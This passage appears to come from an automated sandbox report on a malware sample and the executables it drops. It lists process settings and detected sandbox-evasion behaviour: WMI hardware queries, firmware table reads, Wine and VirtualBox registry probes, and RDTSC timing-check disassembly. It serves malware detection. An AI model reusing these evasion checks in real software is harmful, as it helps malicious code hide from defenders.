                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe Process information set: NOOPENFILEERRORBOX (77 identical entries)
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (45 identical entries)
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
                    Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX (5 identical entries)
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Process information set: NOOPENFILEERRORBOX (16 identical entries)

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9717
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5EB0 second address: CF5EBA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5EBA second address: CF5ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0EC4CB7FD0h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5ED0 second address: CF5EFB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0EC4502028h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5EFB second address: CF5F05 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0EC4CB7FC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4E60 second address: CF4E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4FB4 second address: CF4FD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F0EC4CB7FC6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4FD8 second address: CF4FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4FEB second address: CF5016 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F0EC4CB7FC6h 0x00000009 pop edx 0x0000000a js 00007F0EC4CB7FCCh 0x00000010 jnc 00007F0EC4CB7FC6h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F0EC4CB7FC6h 0x00000021 jmp 00007F0EC4CB7FCAh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5183 second address: CF518E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF542F second address: CF5438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5438 second address: CF543E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF543E second address: CF5442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5442 second address: CF545C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0EC4502016h 0x00000008 jmp 00007F0EC450201Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF545C second address: CF5465 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8172 second address: CF8176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8176 second address: CF822F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 74600AE7h 0x0000000e mov dx, cx 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0EC4CB7FC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jp 00007F0EC4CB7FC6h 0x00000033 add dword ptr [ebp+122D3A02h], ebx 0x00000039 push 00000000h 0x0000003b mov edx, dword ptr [ebp+122D3B5Dh] 0x00000041 push 00000003h 0x00000043 sbb dx, 523Eh 0x00000048 sub di, 411Fh 0x0000004d call 00007F0EC4CB7FC9h 0x00000052 pushad 0x00000053 js 00007F0EC4CB7FD6h 0x00000059 jmp 00007F0EC4CB7FD0h 0x0000005e jmp 00007F0EC4CB7FD2h 0x00000063 popad 0x00000064 push eax 0x00000065 jmp 00007F0EC4CB7FD2h 0x0000006a mov eax, dword ptr [esp+04h] 0x0000006e jmp 00007F0EC4CB7FD4h 0x00000073 mov eax, dword ptr [eax] 0x00000075 pushad 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF822F second address: CF8279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F0EC4502024h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 js 00007F0EC4502020h 0x00000019 pushad 0x0000001a jo 00007F0EC4502016h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 pop eax 0x00000024 mov dword ptr [ebp+122D2144h], esi 0x0000002a lea ebx, dword ptr [ebp+1245CFB5h] 0x00000030 mov si, 5F23h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push esi 0x0000003a pop esi 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8279 second address: CF8294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8294 second address: CF82B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0EC4502020h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D0B283 second address: D0B28D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D0B28D second address: D0B297 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0EC450201Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17626 second address: D1762E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17777 second address: D1777D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1777D second address: D1778D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1778D second address: D177A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F0EC450201Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177A9 second address: D177AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177AF second address: D177B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177B8 second address: D177BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177BC second address: D177C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177C0 second address: D177D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F0EC4CB7FC6h 0x0000000f js 00007F0EC4CB7FC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17950 second address: D17971 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0EC450202Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17971 second address: D17989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17C64 second address: D17C70 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0EC450201Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17DEA second address: D17DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17DF1 second address: D17DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17F5A second address: D17F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4CB7FCAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17F68 second address: D17F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502025h 0x00000007 jmp 00007F0EC450201Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F0EC4502022h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17F9E second address: D17FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FA4 second address: D17FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FA8 second address: D17FBD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4CB7FC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FBD second address: D17FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F0EC450201Eh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FD0 second address: D17FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD9h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FEF second address: D17FFF instructions: 0x00000000 rdtsc 0x00000002 je 00007F0EC4502016h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D183A9 second address: D183AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D183AD second address: D183BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F0EC4502016h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186A6 second address: D186B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0EC4CB7FC6h 0x0000000a jnp 00007F0EC4CB7FD2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186B8 second address: D186C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0EC4502016h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186C2 second address: D186E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 jmp 00007F0EC4CB7FD2h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186E4 second address: D18708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0EC4502021h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0EC450201Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18708 second address: D18713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18713 second address: D18724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC450201Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18724 second address: D1872D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
